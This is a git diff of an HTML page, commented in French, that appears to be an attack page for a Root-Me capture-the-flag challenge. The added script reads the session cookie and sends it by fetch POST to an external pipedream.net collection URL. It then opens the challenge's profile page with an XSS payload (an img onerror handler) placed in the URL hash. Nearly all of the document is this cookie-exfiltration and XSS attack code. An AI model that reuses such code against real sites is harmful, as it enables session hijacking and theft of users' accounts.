--- a/index.html
+++ b/index.html
@@ -5,11 +5,36 @@
 </head>
 <body>
   <script>
+    // Définir l'URL cible de la page
     const targetURL = "http://challenge01.root-me.org:58003/profile";
-    const xssPayload = "<img src='x' onerror='alert("XSS works!")'>";
+    
+    // Définir l'URL de votre serveur RequestBin ou un autre serveur pour recevoir les cookies
+    const requestBinURL = "https://eo2uyqmp09oup0u.m.pipedream.net";
+
+    // Récupérer le cookie de session
+    const sessionCookie = document.cookie;
+
+    // Envoyer le cookie de session à votre serveur via fetch
+    if (sessionCookie) {
+      fetch(requestBinURL, {
+        method: "POST",
+        headers: {
+          "Content-Type": "application/json"
+        },
+        body: JSON.stringify({ cookie: sessionCookie })
+      })
+      .then(response => response.json())
+      .then(data => console.log('Cookie envoyé :', data))
+      .catch(error => console.error('Erreur lors de l\'envoi du cookie:', error));
+    }
+
+    const xssPayload = "<img src='x' onerror='alert(\"XSS works!\")'>";
+    
     const maliciousHash = "#<div id='output'>" + xssPayload + "</div>";
+
     const newWindow = window.open(targetURL + maliciousHash);
   </script>
-  <p>Chargement2...</p>
+  
+  <p>Chargement...</p>
 </body>
 </html>
